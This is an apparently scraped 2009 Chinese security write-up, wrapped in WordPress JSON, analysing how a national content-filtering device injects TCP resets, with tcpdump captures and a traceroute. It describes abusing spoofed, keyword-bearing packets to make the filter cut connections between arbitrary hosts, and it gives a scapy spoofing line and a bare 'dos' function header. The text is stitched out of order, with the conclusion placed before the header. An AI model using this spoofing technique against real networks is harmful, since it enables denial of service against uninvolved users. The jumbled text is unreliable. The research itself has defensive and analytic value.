\u751a\u81f3\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u5bf9\u5176\u4ed6\u7684\u5e94\u7528\u5982gtalk\u8fdb\u884cdos\uff0c\u6211\u4eec\u53ea\u8981\u77e5\u9053\u67d0\u4e2a\u516c\u53f8\u7684\u51fa\u53e3ip\uff0c\u7136\u540e\u7f57\u5217gtalk\u7684\u4f7f\u7528ip\u548c\u7aef\u53e3\u5c31\u53ef\u4ee5\u505a\u5230\uff0c\u975e\u5e38\u7b80\u5355\uff0c\u73b0\u5728\u5f88\u591a\u7684\u7f51\u7ad9\u5f80\u56fd\u5916\u642c\uff0c\u90a3\u4f60\u6709\u4e0d\u6709\u8003\u8651\u672c\u6587\u63d0\u5230\u7684\u98ce\u9669\u5462\uff1f\u6709\u7684\u516c\u53f8\u751a\u81f3\u5c06Mail\u670d\u52a1\u5668\u653e\u7f6e\u5728\u56fd\u5916...... tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 20:27:00.456284 IP (tos 0x0, ttl 64, id 60678, offset 0, flags [DF], proto: TCP (6), length: 60) 114.249.114.249.60979 > 64.233.189.147.80: S, cksum 0x5ebc (correct), 1983571278:1983571278(0) win 5840 <mss 1460,sackOK,timestamp 2109016136 0,nop,wscale 7> 20:27:18.827802 IP (tos 0x0, ttl 64, id 60680, offset 0, flags [DF], proto: TCP (6), length: 77) 114.249.114.249.60979 > 64.233.189.147.80: P, cksum 0x02a9 (incorrect (-> 0xd051), 1983571279:1983571304(25) ack 816454472 win 46 <nop,nop,timestamp 2109034511 1259538068> 20:27:37.856781 IP (tos 0x0, ttl 64, id 55788, offset 0, flags [DF], proto: TCP (6), length: 67) 114.249.114.249.60949 > 64.233.189.147.80: P, cksum 0x029f (incorrect (-> 0x4d19), 1962684568:1962684583(15) ack 4247640463 win 46 <nop,nop,timestamp 2109053544 1246071629> \u8fd9\u4e2a\u65f6\u5019\u6293\u5305\u7684\u65f6\u5019\u7531\u4e8e\u6211\u6362\u4e86\u670d\u52a1\u5668\u6ce8\u610fttl\u5df2\u7ecf\u8ddf\u4e4b\u524d\u4e0d\u4e00\u6837\u4e86\uff0c\u4f46\u662f\u90a3\u4e2aid=64\u9732\u51fa\u4e86\u5c3e\u5df4\uff0c\u524d\u9762\u4e09\u4e2a\u5305\u662f\u7b2c\u4e00\u4e2atcp\u94fe\u63a5\uff0c\u7aef\u53e3\u662f60949\uff0c\u540e\u9762\u4e00\u4e2a\u94fe\u63a5\u7684\u7aef\u53e3\u662f60979\uff0c\u4e0b\u9762\u7684\u662f60979\u89e6\u53d1\u89c4\u5219\u88abreset\u6389\u4e86\uff0c\u7136\u540e\u672c\u6765\u6b63\u5e38\u7684\u7b2c\u4e8c\u4e2a\u94fe\u63a5\u4e00\u65e6\u53d1\u51fa\u4e86\u6570\u636e\u5305\u5c31\u7acb\u523b\u88abreset\uff0c\u5145\u5206\u8bc1\u660e\u4e86\u8fd9\u4e2a\u8054\u52a8\u7684\u8fc5\u901f\u548c\u53ca\u65f6\uff1a\uff09 def dos(srcip, dstip , tport ): \u6700\u540e\u518d\u8bf4\u8bf4\u524d\u9762\u7684\u95ee\u9898\uff0c\u5982\u4f55\u5728\u6570\u636e\u5305\u5b8c\u5168\u88ab\u4f2a\u9020\u7684\u65f6\u5019\u5224\u65ad\u8bbe\u5907\u7684\u7269\u7406\u4f4d\u7f6e\uff0c\u5f88\u660e\u663e\uff0c\u8fd8\u662f\u5229\u7528TTL\uff1a <\/p>\n >>> send(IP(dst="64.233.189.103",src="121.121.121.121",ttl=8)\/TCP(dport=80,sport=2222,flags="P",seq=1234568)\/"GET \/q=freenet\/freenet&oq=&aqi=1 HTTP\/1.1") <\/p>\n \u5728ttl=8\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4f9d\u7136\u6536\u5230\u4e86\u7cfb\u7edf\u7684\u91cd\u7f6e\u5305\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u5224\u65ad\u6570\u636e\u5305\u88ab\u65c1\u8def\u7684\u4f4d\u7f6e\u4e86\uff1a\uff09 <\/p>\n 0x03 \u540e\u8bdd <\/p>\n \u4ece\u6280\u672f\u89d2\u5ea6\u6765\u8bb2\uff0c\u907f\u514d\u8fd9\u79cd\u65b9\u5f0f\u7684\u653b\u51fb\u4f1a\u6bd4\u8f83\u56f0\u96be\uff0c\u9632\u706b\u5899\u4f5c\u4e3a\u4e00\u4e2a\u5b89\u5168\u8bbe\u5907\u662f\u4e0d\u80fd\u5bf9\u6b63\u5e38\u7684\u4f7f\u7528\u9020\u6210\u5f71\u54cd\u7684\uff0c\u6240\u4ee5\u68c0\u6d4b\u7684\u65b9\u5f0f\u6765\u8bf4\u8fd8\u662f\u6bd4\u8f83\u88ab\u52a8\uff0c\u8b6c\u5982\u4e0d\u80fd\u5b9e\u65f6\u7684\u4e22\u5f03\u4e00\u4e2a\u6570\u636e\u5305\uff0c\u524d\u9762\u6211\u5c31\u5f88\u5947\u602a\u4e3a\u4ec0\u4e48\u9632\u706b\u5899\u4e0d\u76f4\u63a5\u4e22\u5f03\u53d1\u8d77\u94fe\u63a5\u7684syn\u5305\u6216\u8005\u53d1\u8d77\u975e\u6cd5\u94fe\u63a5\u7684psh\u5305\u5462\uff0c\u8fd9\u662f\u56e0\u4e3a\u9632\u706b\u5899\u6574\u4e2a\u67b6\u6784\u548c\u8bbe\u8ba1\u9020\u6210\u7684\uff0c\u6574\u4e2a\u6570\u636e\u5305\u5df2\u7ecf\u5230\u8fbe\u670d\u52a1\u5668\u4e86\uff0c\u4ed6\u4e0d\u80fd\u4e22\u5f03\u3002\u540c\u6837\uff0c\u7531\u4e8e\u67b6\u6784\u7684\u539f\u56e0\uff0c\u6211\u4eec\u65e0\u6cd5\u4f7f\u540c\u4e00\u6761tcp\u7684\u6570\u636e\u6d41\u6c38\u8fdc\u7ecf\u8fc7\u540c\u4e00\u4e2a\u8def\u7531\u5668\u540c\u4e00\u4e2a\u8bbe\u5907\uff0c\u6240\u4ee5\u6211\u4eec\u65e0\u6cd5\u5bf9\u4e00\u4e2a\u6570\u636e\u5305\u7684\u6709\u6548\u6027\u505a\u9a8c\u8bc1\uff0c\u800c\u5373\u4f7f\u53ef\u4ee5\u9a8c\u8bc1\u6574\u4e2a\u8bf7\u6c42\u7684\u6709\u6548\u6027\u4e5f\u53ef\u4ee5\u770b\u5230\uff0c\u5728\u9632\u706b\u5899\u4e24\u4fa7\u4e00\u8d77\u611a\u5f04\u9632\u706b\u5899\u662f\u591a\u4e48\u5bb9\u6613\u7684\u4e8b\u60c5\uff0c\u8ddf\u4ee5\u524d\u7684\u53cd\u5f39\u7a7f\u900f\u9632\u706b\u5899\u4e00\u6837\uff0c\u5229\u7528ttl\u7684\u5dee\u5f02\u6211\u4eec\u4e00\u6837\u53ef\u4ee5bypass\u6389\u5bf9\u4e00\u4e2a\u6570\u636e\u5305\u505a\u771f\u5b9e\u7684\u6709\u6548\u6027\u9a8c\u8bc1\uff0c\u8fd9\u91cc\u5305\u62ec\u5176\u4ed6\u5382\u5546\u7684\u5982Cisco\u7b49\u8bbe\u5907\u90fd\u53ef\u80fd\u4f1a\u6709\u8fd9\u79cd\u95ee\u9898\u3002\u6211\u4e0d\u77e5\u9053\u5bf9\u4e8e\u4e00\u4e2a\u8bbe\u5907\u6765\u8bf4\uff0c\u629b\u5f03\u4e00\u4e2attl\u8fc7\u5c0f\u7684\u5305\u662f\u5426\u660e\u667a\uff0c\u9632\u706b\u5899\u662f\u65c1\u8def\u5728\u8bbe\u5907\u91cc\uff0c\u4e5f\u65e0\u6cd5\u5bf9ttl\u6bd4\u8f83\u5c0f\u7684\u5305\u505a\u5230\u5b9e\u65f6\u7684\u4e22\u5f03\uff0c\u4e00\u65e6\u53d1\u73b0\u53d1\u73b0\u6709ttl\u8fc7\u5c0f\u7684\u5305\u80af\u5b9a\u4e0d\u80fd\u76f4\u63a5\u653e\u8fc7\uff0c\u56e0\u4e3a\u53ef\u80fd\u522b\u4eba\u5c31\u5229\u7528\u8fd9\u4e2a\u6765bypass\u9632\u706b\u5899\uff0c\u90a3\u4e48\u5fc5\u987b\u5bf9ttl\u8fc7\u5c0f\u7684\u5305\u505a\u5904\u7406\uff0c\u5904\u7406\u5305\u62ec\u54cd\u5e94rst\u94fe\u63a5\u8981\u6c42\u91cd\u7f6e\uff0c\u8fd9\u7684\u786e\u4f1a\u7f13\u89e3\u672c\u6587\u63d0\u5230\u7684\u95ee\u9898\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u8fd9\u4e48\u590d\u6742\u7684\u903b\u8f91\u4f1a\u4e0d\u4f1a\u5e26\u6765\u65b0\u7684\u95ee\u9898\uff0c\u903b\u8f91\u53ef\u80fd\u672c\u8eab\u5c31\u662f\u6f0f\u6d1e\u3002\u5728TTL\u4e4b\u5916\uff0c\u800c\u76f8\u4fe1\u5176\u4ed6\u7684\u7578\u5f62\u7684\u6570\u636e\u5305\u4e00\u6837\u53ef\u80fd\u9020\u6210\u8bbe\u5907\u5904\u7406\u4e0a\u7684\u5931\u8bef\uff0c\u53ea\u8981\u670d\u52a1\u5668\u548c\u8bbe\u5907\u5bf9\u6570\u636e\u5305\u5904\u7406\u4e0d\u4e00\u81f4\u5c31\u53ef\u4ee5\u5b9e\u73b0\uff0c\u800c\u8fd9\u79cd\u4e0d\u4e00\u81f4\u6027\u56e0\u4e3a\u79cd\u79cd\u539f\u56e0\u662f\u975e\u5e38\u591a\u7684\u3002\u672c\u6587\u53ea\u662f\u5bf9\u5b66\u4e60\u7684\u7f51\u7edc\u77e5\u8bc6\u505a\u4e86\u4e00\u6b21\u5b9e\u8df5\uff0c\u611f\u8c22\u5386\u6765\u5e2e\u52a9\u6211\u5b66\u4e60\u7684\u540c\u5b66\uff0c\u4f60\u4eec\u77e5\u9053\u4f60\u4eec\u662f\u8c01\uff1a\uff09<\/p>\n","protected":false},"excerpt":{"rendered":" \u5bf9\u67d0\u6b3e\u56fd\u5bb6\u7ea7\u5185\u5bb9\u8fc7\u6ee4\u7cfb\u7edfDos\u5b89\u5168\u7f3a\u9677\u5206\u6790 Author: jianxin [80sec] EMail: jianxin#80s...<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-751","post","type-post","status-publish","format-standard","hentry","category-hacker"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=751"}],"version-history":[{"count":0,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/751\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
EMail: jianxin#80sec.com
Site: http:\/\/www.80sec.com<\/a>
Date: 2009-1-2
From: http:\/\/www.80sec.com\/release\/dos-with-XXX.txt<\/a><\/p>\n
0x01 know it\uff0c\u4e86\u89e3\u8fd9\u6b3e\u5185\u5bb9\u8fc7\u6ee4\u7cfb\u7edf
0x02 Hack it\uff0c\u5bf9\u9632\u706b\u5899\u7c7bids\u7684\u4e00\u4e9b\u5b89\u5168\u7814\u7a76
0x03 \u540e\u8bdd <\/p>\n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:39:26.261092 IP (tos 0x0, ttl 64, id 33001, offset 0, flags [DF], proto TCP (6), length 60) 192.168.1.4.44297 > 64.233.189.103.80: S, cksum 0xcc0f (correct), 1790346900:1790346900(0) win 5840 <mss 1460,sackOK,timestamp 329341 0,nop,wscale 4>
22:39:26.349797 IP (tos 0x0, ttl 50, id 41053, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.4.44297: S, cksum 0x3698 (correct), 3974796664:3974796664(0) ack 1790346901 win 5672 <mss 1412,sackOK,timestamp 1072157681 329341,nop,wscale 6>
22:39:26.350452 IP (tos 0x0, ttl 64, id 33002, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x79d7 (correct), 1790346901:1790346901(0) ack 3974796665 win 365 <nop,nop,timestamp 329364 1072157681>
22:39:36.161454 IP (tos 0x0, ttl 64, id 33003, offset 0, flags [DF], proto TCP (6), length 67) 192.168.1.4.44297 > 64.233.189.103.80: P, cksum 0xa1a9 (correct), 1790346901:1790346916(15) ack 3974796665 win 365 <nop,nop,timestamp 331806 1072157681>
22:39:36.248632 IP (tos 0x0, ttl 50, id 41053, offset 0, flags [none], proto TCP (6), length 52) 64.233.189.103.80 > 192.168.1.4.44297: ., cksum 0x4a9a (correct), 3974796665:3974796665(0) ack 1790346916 win 89 <nop,nop,timestamp 1072167593 331806>
22:39:37.476626 IP (tos 0x0, ttl 64, id 33004, offset 0, flags [DF], proto TCP (6), length 53) 192.168.1.4.44297 > 64.233.189.103.80: P, cksum 0x3e36 (correct), 1790346916:1790346917(1) ack 3974796665 win 365 <nop,nop,timestamp 332133 1072167593>
22:39:37.563675 IP (tos 0x0, ttl 50, id 41054, offset 0, flags [none], proto TCP (6), length 52) 64.233.189.103.80 > 192.168.1.4.44297: ., cksum 0x442e (correct), 3974796665:3974796665(0) ack 1790346917 win 89 <nop,nop,timestamp 1072168909 332133>
22:39:37.611453 IP (tos 0x0, ttl 50, id 41055, offset 0, flags [none], proto TCP (6), length 1452) 64.233.189.103.80 > 192.168.1.4.44297: . 3974796665:3974798065(1400) ack 1790346917 win 89 <nop,nop,timestamp 1072168933 332133>
22:39:37.611545 IP (tos 0x0, ttl 64, id 33005, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x3cb3 (correct), 1790346917:1790346917(0) ack 3974798065 win 546 <nop,nop,timestamp 332167 1072168933>
22:39:37.624333 IP (tos 0x0, ttl 50, id 41056, offset 0, flags [none], proto TCP (6), length 1452) 64.233.189.103.80 > 192.168.1.4.44297: . 3974798065:3974799465(1400) ack 1790346917 win 89 <nop,nop,timestamp 1072168933 332133>
22:39:37.624364 IP (tos 0x0, ttl 64, id 33006, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x3683 (correct), 1790346917:1790346917(0) ack 3974799465 win 727 <nop,nop,timestamp 332170 1072168933>
22:39:37.642937 IP (tos 0x0, ttl 50, id 41057, offset 0, flags [none], proto TCP (6), length 1452) 64.233.189.103.80 > 192.168.1.4.44297: . 3974799465:3974800865(1400) ack 1790346917 win 89 <nop,nop,timestamp 1072168933 332133>
22:39:37.642953 IP (tos 0x0, ttl 64, id 33007, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x3051 (correct), 1790346917:1790346917(0) ack 3974800865 win 908 <nop,nop,timestamp 332175 1072168933>
22:39:37.646286 IP (tos 0x0, ttl 50, id 41058, offset 0, flags [none], proto TCP (6), length 532) 64.233.189.103.80 > 192.168.1.4.44297: P 3974800865:3974801345(480) ack 1790346917 win 89 <nop,nop,timestamp 1072168933 332133>
22:39:37.646302 IP (tos 0x0, ttl 64, id 33008, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x2dc1 (correct), 1790346917:1790346917(0) ack 3974801345 win 1083 <nop,nop,timestamp 332176 1072168933>
22:39:37.717617 IP (tos 0x0, ttl 50, id 41059, offset 0, flags [none], proto TCP (6), length 1452) 64.233.189.103.80 > 192.168.1.4.44297: . 3974801345:3974802745(1400) ack 1790346917 win 89 <nop,nop,timestamp 1072169045 332167>
22:39:37.717634 IP (tos 0x0, ttl 64, id 33009, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x2713 (correct), 1790346917:1790346917(0) ack 3974802745 win 1264 <nop,nop,timestamp 332193 1072169045>
22:39:37.736610 IP (tos 0x0, ttl 50, id 41060, offset 0, flags [none], proto TCP (6), length 1452) 64.233.189.103.80 > 192.168.1.4.44297: . 3974802745:3974804145(1400) ack 1790346917 win 89 <nop,nop,timestamp 1072169045 332167>
22:39:37.736645 IP (tos 0x0, ttl 64, id 33010, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x20e1 (correct), 1790346917:1790346917(0) ack 3974804145 win 1445 <nop,nop,timestamp 332198 1072169045>
22:39:37.755088 IP (tos 0x0, ttl 50, id 41061, offset 0, flags [none], proto TCP (6), length 1449) 64.233.189.103.80 > 192.168.1.4.44297: P 3974804145:3974805542(1397) ack 1790346917 win 89 <nop,nop,timestamp 1072169045 332167>
22:39:37.755107 IP (tos 0x0, ttl 64, id 33011, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.44297 > 64.233.189.103.80: ., cksum 0x1ab2 (correct), 1790346917:1790346917(0) ack 3974805542 win 1626 <nop,nop,timestamp 332203 1072169045> <\/p>\n
\u90a3\u4e48\u5f53\u4e00\u6b21\u975e\u6cd5\u7684\u8bf7\u6c42\u53d1\u751f\u65f6\uff0c\u60c5\u51b5\u4f1a\u662f\u600e\u4e48\u6837\u7684\u5462\uff1f\u8b6c\u5982\u5728Google\u91cc\u641c\u7d22\u4f1a\u88ab\u5c01\u7981\u7684\u5173\u952e\u8bcdfreenet\u7684\u65f6\u5019\uff0c\u7ed3\u679c\u5982\u4e0b\uff1a <\/p>\n
hkg01s01-in-f103.1e100.net [64.233.189.103] 80 (http) open
GET \/?q=freenet HTTP\/1.1 <\/p>\n
bt ~ # <\/p>\n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:54:15.744058 IP (tos 0x0, ttl 64, id 36724, offset 0, flags [DF], proto TCP (6), length 60) 192.168.1.4.42909 > 64.233.189.103.80: S, cksum 0xd712 (correct), 2729633795:2729633795(0) win 5840 <mss 1460,sackOK,timestamp 550775 0,nop,wscale 4>
22:54:15.831374 IP (tos 0x0, ttl 50, id 12868, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.4.42909: S, cksum 0x9163 (correct), 1209516567:1209516567(0) ack 2729633796 win 5672 <mss 1412,sackOK,timestamp 1081539534 550775,nop,wscale 6>
22:54:15.831408 IP (tos 0x0, ttl 64, id 36725, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.42909 > 64.233.189.103.80: ., cksum 0xd4a3 (correct), 2729633796:2729633796(0) ack 1209516568 win 365 <nop,nop,timestamp 550797 1081539534>
22:54:31.619002 IP (tos 0x0, ttl 64, id 36726, offset 0, flags [DF], proto TCP (6), length 77) 192.168.1.4.42909 > 64.233.189.103.80: P, cksum 0xd6e1 (correct), 2729633796:2729633821(25) ack 1209516568 win 365 <nop,nop,timestamp 554727 1081539534>
22:54:31.727889 IP (tos 0x0, ttl 50, id 12868, offset 0, flags [none], proto TCP (6), length 52) 64.233.189.103.80 > 192.168.1.4.42909: ., cksum 0x8867 (correct), 1209516568:1209516568(0) ack 2729633821 win 89 <nop,nop,timestamp 1081555371 554727>
22:54:32.065444 IP (tos 0x0, ttl 64, id 36727, offset 0, flags [DF], proto TCP (6), length 53) 192.168.1.4.42909 > 64.233.189.103.80: P, cksum 0x7cdb (correct), 2729633821:2729633822(1) ack 1209516568 win 365 <nop,nop,timestamp 554838 1081555371>
22:54:32.148169 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.4.42909: R, cksum 0x3399 (correct), 1209516568:1209516568(0) win 2605
22:54:32.151504 IP (tos 0x0, ttl 50, id 12869, offset 0, flags [none], proto TCP (6), length 52) 64.233.189.103.80 > 192.168.1.4.42909: ., cksum 0x863a (correct), 1209516568:1209516568(0) ack 2729633822 win 89 <nop,nop,timestamp 1081555816 554838>
22:54:32.151840 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.4.42909 > 64.233.189.103.80: R, cksum 0xbd24 (correct), 2729633822:2729633822(0) win 0
22:54:32.153474 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.4.42909: R, cksum 0x1779 (correct), 1209516568:1209516568(0) win 9805 <\/p>\n
22:54:32.148169 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.4.42909: R, cksum 0x3399 (correct), 1209516568:1209516568(0) win 2605 <\/p>\n
1 localhost (192.168.1.1) 4.667 ms 1.949 ms 1.650 ms
2 114.249.208.1 (114.249.208.1) 28.304 ms 28.438 ms 34.123 ms
3 125.35.65.97 (125.35.65.97) 26.429 ms 27.363 ms 25.844 ms
4 bt-227-109.bta.net.cn (202.106.227.109) 27.641 ms 26.971 ms 27.268 ms
5 61.148.153.121 (61.148.153.121) 26.936 ms 27.722 ms 27.802 ms
6 123.126.0.121 (123.126.0.121) 27.675 ms 26.996 ms 28.620 ms
7 219.158.4.94 (219.158.4.94) 82.732 ms 82.175 ms 82.608 ms
8 219.158.3.66 (219.158.3.66) 69.978 ms 70.491 ms 136.986 ms
9 219.158.3.130 (219.158.3.130) 77.807 ms 87.424 ms 446.165 ms
10 219.158.32.230 (219.158.32.230) 413.888 ms 87.384 ms 86.614 ms
11 64.233.175.207 (64.233.175.207) 114.188 ms 79.037 ms 113.107 ms
12 209.85.241.56 (209.85.241.56) 87.721 ms 88.063 ms 87.341 ms
13 66.249.94.6 (66.249.94.6) 87.068 ms 99.377 ms 94.140 ms
14 hkg01s01-in-f103.1e100.net (64.233.189.103) 86.094 ms 85.901 ms 86.429 ms <\/p>\n
\u518d\u6765\u5206\u6790\u4e0b\u662f\u5982\u4f55\u62d2\u7edd\u6389\u6211\u4eec\u7684\u94fe\u63a5\u7684\uff0c\u8be5\u8bbe\u5907\u5ac1\u63a5\u5728\u9aa8\u5e72\u7f51\u4e0a\uff0c\u8bf4\u662f\u5ac1\u63a5\u662f\u56e0\u4e3a\u505a\u8fd9\u4e2a\u4e8b\u60c5\u7684\u5e94\u8be5\u4e0d\u662f\u9aa8\u5e72\u8def\u7531\u5668\uff0c\u4eceTTL\u6216\u8005\u5176\u4ed6\u4e00\u4e9b\u5e38\u8bc6\u53ef\u4ee5\u770b\u51fa\u6765\uff0c\u6bd5\u7adf\u9aa8\u5e72\u8def\u7531\u4e0a\u76f4\u63a5\u505a\u64cd\u4f5c\u7684\u8bdd\u98ce\u9669\u592a\u5927\u4e86\uff0c\u4e0d\u80fd\u5f71\u54cd\u6b63\u5e38\u5e94\u7528\u8fd9\u662f\u9632\u706b\u5899\u8d77\u7801\u7684\u8981\u6c42\uff0c\u65e2\u7136\u8be5\u8bbe\u5907\u80fd\u5904\u4e8e\u8fd9\u4e48\u4e00\u4e2a\u4f4d\u7f6e\uff0c\u90a3\u4e48\u81ea\u7136\u53ef\u4ee5\u505a\u5230\u5c06\u6d41\u91cf\u4ee5\u955c\u50cf\u7684\u65b9\u5f0f\u5bfc\u5165\u5230\u81ea\u5df1\u7684\u8bbe\u5907\u4e0a\uff0c\u5e76\u4e14\u5b9e\u65f6\u7684\u76d1\u89c6\u6574\u4e2atcp\u7684\u94fe\u63a5\u3002\u6211\u4eec\u77e5\u9053\u60f3\u8868\u793a\u4e00\u6761\u6b63\u5e38\u7684tcp\u94fe\u63a5\u662f\u9700\u8981\u4e94\u5143\u7ec4\u7684\uff0c\u5305\u62ec\u534f\u8bae\uff0c\u6e90\u7aef\u53e3\uff0c\u6e90IP\uff0c\u76ee\u7684\u7aef\u53e3\uff0c\u76ee\u7684IP\uff0c\u60f3\u5b8c\u6574\u7684\u63a7\u5236\u4e00\u4e2atcp\u94fe\u63a5\u8fd8\u9700\u8981\u5728\u8fd9\u4e2a\u57fa\u7840\u4e0a\u52a0\u4e00\u4e2aseq\uff0cack\u5e8f\u5217\u53f7\u8868\u793a\u6b63\u5e38\u7684tcp\u8fdb\u884c\u7684\u72b6\u6001\uff0c\u60f3\u731c\u6d4b\u8fd9\u4e9b\u57fa\u672c\u662f\u4e0d\u53ef\u80fd\u7684\u3002\u9ed1\u5ba2\u591a\u5c11\u5e74\u68a6\u60f3\u7684\u5bf9\u8fd9\u4e9b\u7684\u9884\u6d4b\u90fd\u53ef\u4ee5\u8f7b\u6613\u5728\u9aa8\u5e72\u8def\u7531\u4e0a\u7684\u65c1\u8def\u8bbe\u5907\u5b9e\u73b0\uff0c\u5728\u67d0\u4e9b\u7701\u5e02\u5927\u884c\u52ab\u6301\u4e4b\u9053\u7684\u8fd0\u8425\u5546\u9762\u524d\uff0c\u9ed1\u5ba2\u662f\u4e2a\u5f31\u52bf\u7fa4\u4f53\u3002\u65e2\u7136\u6709\u4e94\u5143\u7ec4\uff0c\u8fd8\u6709\u5e8f\u5217\u53f7\uff0c\u90a3\u4e48\u5bf9tcp\u7684\u64cd\u4f5c\u81ea\u7136\u975e\u5e38\u7b80\u5355\u4e86\uff0c\u6700\u9ad8\u660e\u7684\u5c31\u662f\u4e00\u4e2arst\u5305\u8ba9\u6574\u4e2atcp\u94fe\u63a5\u76f4\u63a5\u6d88\u5931\u6389\u3002\u6709\u4e9b\u6587\u7ae0\u8bf4\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u4f1a\u5411\u4e24\u8fb9\u53d1\u9001rst\u5305\uff0c\u4ece\u6211\u7684\u6293\u5305\u5206\u6790\u7ed3\u679c\u6765\u770b\uff0c\u770b\u8d77\u6765\u8fd9\u4e2a\u7ed3\u8bba\u5e76\u4e0d\u53ef\u9760\uff0c\u5982\u679c\u5411google\u53d1\u9001\u4e86rst\u5305\u7684\u8bdd\uff0c\u90a3\u4e48\u540e\u9762\u4e00\u4e2apush\u7684ack\u5305\u5c31\u5e94\u8be5\u662f\u6ca1\u6709\u6536\u5230\u624d\u5bf9\u3002\u53e6\u5916\u53ef\u4ee5\u770b\u5230\uff0c\u7b2c\u4e00\u4e2apush\u5305\u53d1\u51fa\u53bb\u4e4b\u540e\uff0c\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5c31\u6709\u4e86\u53cd\u5e94\uff0c\u5e76\u4e0d\u7b49\u6211\u7b2c\u4e8c\u4e2a\u5305\u8bf7\u6c42\u53d1\u51fa\u53bb\u51d1\u6210\u4e00\u4e2a\u5b8c\u6574\u7684http\u8bf7\u6c42\u6211\u4eec\u5c31\u6536\u5230\u4e86rst\u5305\uff0c\u8fd9\u4e2apush\u5305\u89e6\u53d1\u4e86\u7279\u5f81\u4e86\u3002\u4f46\u662f\u6211\u6bd4\u8f83\u5947\u602a\u7684\u662f\uff0c\u5982\u679c\u662f\u8fd9\u6837\uff0c\u90a3\u4e48\u5f88\u53ef\u80fd\u5728\u65f6\u95f4\u4e0a\u51fa\u73b0\u670d\u52a1\u5668\u7684push\u5305\u6bd4rst\u5305\u5148\u5230\u8fbe\uff0c\u8fd9\u6837\u5c31\u8d77\u4e0d\u5230\u963b\u65ad\u7684\u4f5c\u7528\uff0c\u4f46\u662f\u4ece\u8ddd\u79bb\u548c\u670d\u52a1\u5668\u9700\u8981\u5bf9\u8bf7\u6c42\u54cd\u5e94\u8fd9\u70b9\u6765\u770b\uff0c\u8fd9\u53d1\u751f\u7684\u51e0\u7387\u6bd4\u8f83\u5c0f\uff0c\u53e6\u5916\u4e00\u79cd\u53ef\u80fd\u662f\uff0c\u6211\u4eec\u5ba2\u6237\u7aef\u53d1\u9001\u7684rst\u5305\u5230\u8fbeGoogle\u670d\u52a1\u5668\u7684\u65f6\u5019\uff0c\u670d\u52a1\u5668\u7684push\u5305\u5df2\u7ecf\u53d1\u9001\u5230\u6211\u4eec\u7684\u5ba2\u6237\u7aef\u4e86\uff0c\u5c3d\u7ba1\u4e0d\u80fd\u5b8c\u6210\u5c55\u73b0\uff0c\u4f46\u662f\u5305\u5df2\u7ecf\u6536\u5230\u4e86\uff0c\u4e0d\u662f\u4e48\uff0c\u5475\u5475\uff01\u53e6\u5916\u4e00\u70b9\uff0c\u4ece\u591a\u6b21\u8bd5\u9a8c\u7684\u7ed3\u679c\u6765\u770b\uff0c\u6211\u4eec\u901a\u8fc7\u5728\u7cfb\u7edf\u5e95\u5c42\u5904\u7406\u6389id=64\u7684\u5305\uff0c\u662f\u53ef\u4ee5\u5b8c\u6210\u8fd9\u4e00\u6b21\u8bf7\u6c42\u7684\uff0c\u6c34\u5e73\u6709\u9650\uff0c\u4ee5\u540e\u518d\u6d4b\u8bd5\uff1a\uff09
